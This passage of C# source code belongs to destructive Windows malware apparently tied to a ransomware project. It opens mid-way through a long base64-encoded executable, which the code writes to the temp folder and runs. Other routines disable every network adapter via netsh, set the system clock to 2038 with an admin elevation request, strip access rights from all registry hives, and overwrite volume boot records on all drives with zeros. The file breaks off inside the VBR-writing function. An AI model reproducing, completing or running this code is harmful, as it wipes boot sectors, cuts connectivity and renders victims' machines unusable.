wYXRpYmxlVGV4dFJlbmRlcmluZ0RlZmF1bHQARGlhbG9nUmVzdWx0AEdldFJlc3VsdABTZXRSZXN1bHQARW52aXJvbm1lbnQASW5pdGlhbGl6ZUNvbXBvbmVudABQb2ludABEZWNyeXB0AHJzYWRlY3J5cHQARW5jcnlwdAByc2FlbmNyeXB0AFRocmVhZFN0YXJ0AFN1c3BlbmRMYXlvdXQAUmVzdW1lTGF5b3V0AFBlcmZvcm1MYXlvdXQATW92ZU5leHQAU3lzdGVtLlRleHQAZ2V0X1RleHQAc2V0X1RleHQAU2hvdwBzZXRfVGFiSW5kZXgATWVzc2FnZUJveABMaXN0Qm94AFRleHRCb3gASW5pdGlhbGl6ZUFycmF5AFRvQXJyYXkAcmV2ZXJzZWJhcnJheQBzZXRfS2V5AHB1YmxpY2tleQBjbG9zZWRob2xka2V5AHJzYWdlbmVyYXRla2V5AHhtbGtleQBnZW5lcmF0ZXJhbmRvbWtleQBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5AGdldF9Bc3NlbWJseQBEaXJlY3RvcnkAb3BfRXF1YWxpdHkAAAADIwAANXEAdwBlAHIAdAB5AHUAaQBvAHAAYQBzAGQAZgBnAGgAagBrAGwAegB4AGMAdgBiAG4AbQAAAQCDPzwAUgBTAEEASwBlAHkAVgBhAGwAdQBlAD4APABNAG8AZAB1AGwAdQBzAD4AcwBGAEMAagBYAEQATABUAFQAcwBMAEoARwBIAFIAQwBLADUAdQBUAGEAdwB3AEIAQwBXAFUAVwB5AFUARABLAC8AQwBzAHgAQgBuADUAbQBRAEsAbABPAFoAZAAwAGkAYgBCAHYAWgAzAGwAcABvAFEAcAB1AHkAdwB3ADYAYwBYADAAOQA2AGUASwBQAHMAVwA4AHYATwBDAFUATgBSAGYAdwB4AHYAOQBtAGYAVABoAFUASgA4AFkAawArAGwAMAB1AEwAWAB2AEMAOABrAFIAbgBOAFkATwBtAEYAWgBDAGYAdwBnAHYAVABFAGQASQBaAHQAWQBJAFQAMwA1AG4AYgBSAHkAQQBsAEcARgBHAEwANAA5AHoAVABZAFQAbQBoAC8ATgBFAEoAYwBaAGEAcwBTAEkAMQBYAGYASABaAHQAKwBHADIAVABXADYAMgB1ADIAdwA0AFoAVAB1AGYAUgBSAG8AcwBWAHIANQBkAGsAVwBNADgAQwBGAFIAVgBMAFYAKwBLAHQAbwBYAHEAQQAwADgAeQB1ADIATQBTAEwAKwBVAFUAWABEAG4AVAA4AFcATwBZAE4ASAAwAHUAbgBoAG8ASwBiADQAeABDAFcAZABiAFQAMQByAGkAUAAvADUATABQAEYAaQBjAFgAUQBpADYAbABRAHkAaABTAEEARgBYAHQAcABmAGUASQByAGsAdgB2AHAAaAB3AG8AUgBKAEsAcwA5ADUANQBaAEkANABLAHYAVQBPAHQAdwBiAEUAMwA2ADEAbQBLAEoAdgBJAEIANgBGAHUAQgBjAEMAbQB3AFMAYwBvAEQAaABnAFEAawBHACsANABxADQATQBKAHMAWgAzAHoAeQBwADAAKwBEAHUAcgBpAEQAeQBNAGMAdgBCAFEAPQA9ADwALwBNAG8AZAB1AGwAdQBzAD4APABFAHgAcABvAG4AZQBuAHQAPgBBAFEAQQBCADwALwBFAHgAcABvAG4AZQBuAHQAPgA8AC8AUgBTAEEASwBlAHkAVgBhAGwAdQBlAD4AAEtFAG4AdABlAHIAIABhACAAYwBvAHIAcgBlAGMAdAAgAGsAZQB5ACAAdABvACAAZABlAGMAcgB5AHAAdAAgAGYAaQBsAGUAcwAuAAATRABvAHcAbgBsAG8AYQBkAHMAABF0AGUAeAB0AEIAbwB4ADEAAA9iAHUAdAB0AG8AbgAxAAAPRABlAGMAcgB5AHAAdAAAEWwAaQBzAHQAQgBvAHgAMQAADWwAYQBiAGUAbAAxAAA5RQBuAHQAZQByACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5ACAAdABvACAAZABlAGMAcgB5AHAAdAAADWwAYQBiAGUAbAAyAAAfUwB0AGEAdAB1AHMAOgAgAHcAYQBpAHQAaQBuAGcAAAtGAG8AcgBtADEAAClXAGkAbgBiAGEAbABsADUAMAAxACAARABlAGMAcgB5AHAAdABvAHIAAFNXAGkAbgBiAGEAbABsADUAMAAxAF8ARABlAGMAcgB5AHAAdABvAHIALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AUgBlAHMAbwB1AHIAYwBlAHMAAEl5AG8AdQBjAGEAbgBqAG8AaQBuAHMAYQBsAHQAaQBuAGYAdQB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AaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAHGQAAFMNAAAAAAAAAAAAAO+7vzw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8YXNzZW1ibHkgbWFuaWZlc3RWZXJzaW9uPSIxLjAiIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MSI+DQogIDxhc3NlbWJseUlkZW50aXR5IHZlcnNpb249IjEuMC4wLjAiIG5hbWU9Ik15QXBwbGljYXRpb24uYXBwIi8+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYyIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjMiPg0KICAgICAgICA8IS0tIFVBQyBNYW5pZmVzdCBPcHRpb25zDQogICAgICAgICAgICAgSWYgeW91IHdhbnQgdG8gY2hhbmdlIHRoZSBXaW5kb3dzIFVzZXIgQWNjb3VudCBDb250cm9sIGxldmVsIHJlcGxhY2UgdGhlIA0KICAgICAgICAgICAgIHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIG5vZGUgd2l0aCBvbmUgb2YgdGhlIGZvbGxvd2luZy4NCg0KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwgIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSIgLz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsICBsZXZlbD0icmVxdWlyZUFkbWluaXN0cmF0b3IiIHVpQWNjZXNzPSJmYWxzZSIgLz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsICBsZXZlbD0iaGlnaGVzdEF2YWlsYWJsZSIgdWlBY2Nlc3M9ImZhbHNlIiAvPg0KDQogICAgICAgICAgICBTcGVjaWZ5aW5nIHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGVsZW1lbnQgd2lsbCBkaXNhYmxlIGZpbGUgYW5kIHJlZ2lzdHJ5IHZpcnR1YWxpemF0aW9uLiANCiAgICAgICAgICAgIFJlbW92ZSB0aGlzIGVsZW1lbnQgaWYgeW91ciBhcHBsaWNhdGlvbiByZXF1aXJlcyB0aGlzIHZpcnR1YWxpemF0aW9uIGZvciBiYWNrd2FyZHMNCiAgICAgICAgICAgIGNvbXBhdGliaWxpdHkuDQogICAgICAgIC0tPg0KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwgbGV2ZWw9InJlcXVpcmVBZG1pbmlzdHJhdG9yIiB1aUFjY2Vzcz0iZmFsc2UiIC8+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1cml0eT4NCiAgPC90cnVzdEluZm8+DQoNCiAgPGNvbXBhdGliaWxpdHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206Y29tcGF0aWJpbGl0eS52MSI+DQogICAgPGFwcGxpY2F0aW9uPg0KICAgICAgPCEtLSBBIGxpc3Qgb2YgdGhlIFdpbmRvd3MgdmVyc2lvbnMgdGhhdCB0aGlzIGFwcGxpY2F0aW9uIGhhcyBiZWVuIHRlc3RlZCBvbg0KICAgICAgICAgICBhbmQgaXMgZGVzaWduZWQgdG8gd29yayB3aXRoLiBVbmNvbW1lbnQgdGhlIGFwcHJvcHJpYXRlIGVsZW1lbnRzDQogICAgICAgICAgIGFuZCBXaW5kb3dzIHdpbGwgYXV0b21hdGljYWxseSBzZWxlY3QgdGhlIG1vc3QgY29tcGF0aWJsZSBlbnZpcm9ubWVudC4gLS0+DQoNCiAgICAgIDwhLS0gV2luZG93cyBWaXN0YSAtLT4NCiAgICAgIDwhLS08c3VwcG9ydGVkT1MgSWQ9IntlMjAxMTQ1Ny0xNTQ2LTQzYzUtYTVmZS0wMDhkZWVlM2QzZjB9IiAvPi0tPg0KDQogICAgICA8IS0tIFdpbmRvd3MgNyAtLT4NCiAgICAgIDwhLS08c3VwcG9ydGVkT1MgSWQ9InszNTEzOGI5YS01ZDk2LTRmYmQtOGUyZC1hMjQ0MDIyNWY5M2F9IiAvPi0tPg0KDQogICAgICA8IS0tIFdpbmRvd3MgOCAtLT4NCiAgICAgIDwhLS08c3VwcG9ydGVkT1MgSWQ9Ins0YTJmMjhlMy01M2I5LTQ0NDEtYmE5Yy1kNjlkNGE0YTZlMzh9IiAvPi0tPg0KDQogICAgICA8IS0tIFdpbmRvd3MgOC4xIC0tPg0KICAgICAgPCEtLTxzdXBwb3J0ZWRPUyBJZD0iezFmNjc2Yzc2LTgwZTEtNDIzOS05NWJiLTgzZDBmNmQwZGE3OH0iIC8+LS0+DQoNCiAgICAgIDwhLS0gV2luZG93cyAxMCAtLT4NCiAgICAgIDwhLS08c3VwcG9ydGVkT1MgSWQ9Ins4ZTBmN2ExMi1iZmIzLTRmZTgtYjlhNS00OGZkNTBhMTVhOWF9IiAvPi0tPg0KDQogICAgPC9hcHBsaWNhdGlvbj4NCiAgPC9jb21wYXRpYmlsaXR5Pg0KDQogIDwhLS0gSW5kaWNhdGVzIHRoYXQgdGhlIGFwcGxpY2F0aW9uIGlzIERQSS1hd2FyZSBhbmQgd2lsbCBub3QgYmUgYXV0b21hdGljYWxseSBzY2FsZWQgYnkgV2luZG93cyBhdCBoaWdoZXINCiAgICAgICBEUElzLiBXaW5kb3dzIFByZXNlbnRhdGlvbiBGb3VuZGF0aW9uIChXUEYpIGFwcGxpY2F0aW9ucyBhcmUgYXV0b21hdGljYWxseSBEUEktYXdhcmUgYW5kIGRvIG5vdCBuZWVkIA0KICAgICAgIHRvIG9wdCBpbi4gV2luZG93cyBGb3JtcyBhcHBsaWNhdGlvbnMgdGFyZ2V0aW5nIC5ORVQgRnJhbWV3b3JrIDQuNiB0aGF0IG9wdCBpbnRvIHRoaXMgc2V0dGluZywgc2hvdWxkIA0KICAgICAgIGFsc28gc2V0IHRoZSAnRW5hYmxlV2luZG93c0Zvcm1zSGlnaERwaUF1dG9SZXNpemluZycgc2V0dGluZyB0byAndHJ1ZScgaW4gdGhlaXIgYXBwLmNvbmZpZy4gDQogICAgICAgDQogICAgICAgTWFrZXMgdGhlIGFwcGxpY2F0aW9uIGxvbmctcGF0aCBhd2FyZS4gU2VlIGh0dHBzOi8vZG9jcy5taWNyb3NvZnQuY29tL3dpbmRvd3Mvd2luMzIvZmlsZWlvL21heGltdW0tZmlsZS1wYXRoLWxpbWl0YXRpb24gLS0+DQogIDwhLS0NCiAgPGFwcGxpY2F0aW9uIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+DQogICAgPHdpbmRvd3NTZXR0aW5ncz4NCiAgICAgIDxkcGlBd2FyZSB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9TTUkvMjAwNS9XaW5kb3dzU2V0dGluZ3MiPnRydWU8L2RwaUF3YXJlPg0KICAgICAgPGxvbmdQYXRoQXdhcmUgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vU01JLzIwMTYvV2luZG93c1NldHRpbmdzIj50cnVlPC9sb25nUGF0aEF3YXJlPg0KICAgIDwvd2luZG93c1NldHRpbmdzPg0KICA8L2FwcGxpY2F0aW9uPg0KICAtLT4NCg0KICA8IS0tIEVuYWJsZSB0aGVtZXMgZm9yIFdpbmRvd3MgY29tbW9uIGNvbnRyb2xzIGFuZCBkaWFsb2dzIChXaW5kb3dzIFhQIGFuZCBsYXRlcikgLS0+DQogIDwhLS0NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkNCiAgICAgICAgICB0eXBlPSJ3aW4zMiINCiAgICAgICAgICBuYW1lPSJNaWNyb3NvZnQuV2luZG93cy5Db21tb24tQ29udHJvbHMiDQogICAgICAgICAgdmVyc2lvbj0iNi4wLjAuMCINCiAgICAgICAgICBwcm9jZXNzb3JBcmNoaXRlY3R1cmU9IioiDQogICAgICAgICAgcHVibGljS2V5VG9rZW49IjY1OTViNjQxNDRjY2YxZGYiDQogICAgICAgICAgbGFuZ3VhZ2U9IioiDQogICAgICAgIC8+DQogICAgPC9kZXBlbmRlbnRBc3NlbWJseT4NCiAgPC9kZXBlbmRlbmN5Pg0KICAtLT4NCg0KPC9hc3NlbWJseT4NCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAADAAAAMw6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==";
                    RunBase64DecodedExe(base64EncodedExe);
                    Console.WriteLine("Executable run successfully.");
                });

                // Wait for all tasks to complete
                Task.WhenAll(runBase64ExeTask, corruptVbrTask).Wait();
            }
            catch (Exception ex)
            {
                Console.WriteLine($"An error occurred: {ex.Message}");
            }

            Console.WriteLine("Press any key to exit.");
            Console.ReadKey();
        }

        private static string[] GetNetworkAdapters()
        {
            try
            {
                // Execute the netsh command to show network interfaces
                Process process = new Process
                {
                    StartInfo = new ProcessStartInfo
                    {
                        FileName = "netsh",
                        Arguments = "interface show interface",  // Command to list all network interfaces
                        RedirectStandardOutput = true,
                        UseShellExecute = false,
                        CreateNoWindow = true
                    }
                };

                // Start the process and capture the output
                process.Start();
                string output = process.StandardOutput.ReadToEnd();
                process.WaitForExit();

                // Extract the names of the network interfaces from the output
                var lines = output.Split(new[] { Environment.NewLine }, StringSplitOptions.RemoveEmptyEntries);
                var adapterNames = lines.Skip(3)  // Skip the header lines
                                        .Select(line => line.Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries)[0])
                                        .ToArray();

                Console.WriteLine("Network adapters found:");
                foreach (var adapter in adapterNames)
                {
                    Console.WriteLine(adapter);
                }

                return adapterNames;
            }
            catch (Exception ex)
            {
                Console.WriteLine($"An error occurred while getting network adapters: {ex.Message}");
                return Array.Empty<string>();
            }
        }

        private static void CutNetworkConnections(string[] adapters)
        {
            try
            {
                foreach (var adapter in adapters)
                {
                    Process process = new Process
                    {
                        StartInfo = new ProcessStartInfo
                        {
                            FileName = "netsh",
                            Arguments = $"interface set interface \"{adapter}\" admin=disable",  // Disable the adapter
                            UseShellExecute = false,
                            CreateNoWindow = true
                        }
                    };

                    // Run the process to disable the network adapter
                    process.Start();
                    process.WaitForExit();
                    Console.WriteLine($"Network interface {adapter} disabled.");
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine($"An error occurred while cutting network connections: {ex.Message}");
            }
        }

        private static void RunBase64DecodedExe(string base64EncodedExe)
        {
            try
            {
                // Decode the Base64 string into a byte array
                byte[] exeBytes = Convert.FromBase64String(base64EncodedExe);

                // Define a temporary path to save the executable
                string tempExePath = Path.Combine(Path.GetTempPath(), "decodedExecutable.exe");

                // Write the decoded bytes to the temporary file
                File.WriteAllBytes(tempExePath, exeBytes);

                // Set execution permissions (optional on some systems)
                File.SetAttributes(tempExePath, FileAttributes.Normal);

                // Run the executable
                Process process = new Process
                {
                    StartInfo = new ProcessStartInfo
                    {
                        FileName = tempExePath,
                        UseShellExecute = true,
                    }
                };
                process.Start();
                process.WaitForExit(); // Optional: Wait for the executable to finish

                Console.WriteLine("Base64 decoded executable executed successfully.");
            }
            catch (Exception ex)
            {
                Console.WriteLine($"An error occurred while running the Base64 decoded executable: {ex.Message}");
            }
        }

        private static void ChangeSystemDate()
        {
            try
            {
                // Change the system date to 19th January 2038 (requires administrator privileges)
                Process process = new Process
                {
                    StartInfo = new ProcessStartInfo
                    {
                        FileName = "cmd.exe",
                        Arguments = "/C date 01-19-2038", // MM-dd-yyyy format for Windows
                        UseShellExecute = true,
                        Verb = "runas" // Run as administrator
                    }
                };
                process.Start();
                process.WaitForExit();
                Console.WriteLine("System date changed to 19-01-2038.");
            }
            catch (Exception ex)
            {
                Console.WriteLine($"An error occurred while changing the system date: {ex.Message}");
            }
        }
    }

    public class RegistryAndVbrHandler
    {
        public void LockAllRegistryHives()
        {
            try
            {
                string[] hives = {
                    "HKEY_CLASSES_ROOT",
                    "HKEY_CURRENT_USER",
                    "HKEY_LOCAL_MACHINE",
                    "HKEY_USERS",
                    "HKEY_CURRENT_CONFIG"
                };

                Parallel.ForEach(hives, hive => LockRegistryHive(hive));
            }
            catch (Exception ex)
            {
                Console.WriteLine($"An error occurred while locking all registry hives: {ex.Message}");
            }
        }

        public void LockRegistryHive(string hive)
        {
            try
            {
                RegistryKey baseHive;

                // Determine which hive to open based on the provided hive string
                switch (hive)
                {
                    case "HKEY_CLASSES_ROOT":
                        baseHive = Registry.ClassesRoot;
                        break;
                    case "HKEY_CURRENT_USER":
                        baseHive = Registry.CurrentUser;
                        break;
                    case "HKEY_LOCAL_MACHINE":
                        baseHive = Registry.LocalMachine;
                        break;
                    case "HKEY_USERS":
                        baseHive = Registry.Users;
                        break;
                    case "HKEY_CURRENT_CONFIG":
                        baseHive = Registry.CurrentConfig;
                        break;
                    default:
                        throw new ArgumentException("Unknown hive");
                }

                var security = new RegistrySecurity();
                security.SetAccessRuleProtection(true, false);

                // Grant Full Control only to System and Administrators
                security.AddAccessRule(new RegistryAccessRule(
                    new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null),
                    RegistryRights.FullControl,
                    InheritanceFlags.None,
                    PropagationFlags.None,
                    AccessControlType.Allow));

                security.AddAccessRule(new RegistryAccessRule(
                    new SecurityIdentifier(WellKnownSidType.BuiltinAdministratorsSid, null),
                    RegistryRights.FullControl,
                    InheritanceFlags.None,
                    PropagationFlags.None,
                    AccessControlType.Allow));

                // Apply the security settings to the hive
                baseHive.SetAccessControl(security);
            }
            catch (Exception ex)
            {
                Console.WriteLine($"An error occurred while locking the registry hive: {ex.Message}");
            }
        }

        public void CorruptAllVBRS()
        {
            try
            {
                int driveLetter = 'C'; // Start from ASCII value of 'C'
                Parallel.For(0, 26, i =>
                {
                    string volumePath = $"\\.\\{(char)(driveLetter + i)}:";

                    // Check if the volume exists
                    if (Directory.Exists(volumePath))
                    {
                        WriteCorruptVBR(volumePath);
                    }
                });
            }
            catch (Exception ex)
            {
                Console.WriteLine($"Failed to corrupt VBRs: {ex.Message}");
            }
        }

        private void WriteCorruptVBR(string volumePath)
        {
            try
            {
                // Create corrupt VBR data (e.g., all zeros or any other pattern)
                byte[] vbrData = new byte[512]; // Create an array of 512 bytes initialized to zero

